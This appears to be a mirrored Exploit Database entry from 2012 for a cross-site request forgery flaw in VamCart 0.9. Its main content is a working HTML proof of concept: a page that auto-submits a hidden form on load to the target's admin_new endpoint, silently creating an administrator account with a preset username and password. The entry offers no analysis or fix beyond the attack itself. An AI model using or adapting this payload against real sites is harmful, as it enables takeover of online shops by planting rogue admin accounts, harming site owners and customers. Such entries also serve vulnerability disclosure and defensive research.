VamCart 0.9 – Cross-Site Request Forgery

• Exploit Database
• 13 阅读

• 作者： DaOne
  日期： 2012-08-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/20710/

• # Exploit Title: VamCart v0.9 CSRF Vulnerability
  # Date: 20/08/2012
  # Author: DaOne 
  # Software Link: http://vamcart.googlecode.com/files/vamcart.zip
  # Greetings to: LCA
  
  # CSRF Add Admin:
  
  <html>
  <body onload="document.form0.submit();">
  <form method="POST" name="form0" action="http://[target]/users/admin_new/">
  <input type="hidden" name="data[User][username]" value="webadmin">
  <input type="hidden" name="data[User][email]" value="admin@email.com"/>
  <input type="hidden" name="data[User][password]" value="pass123"/>
  </form>
  </body>
  </html>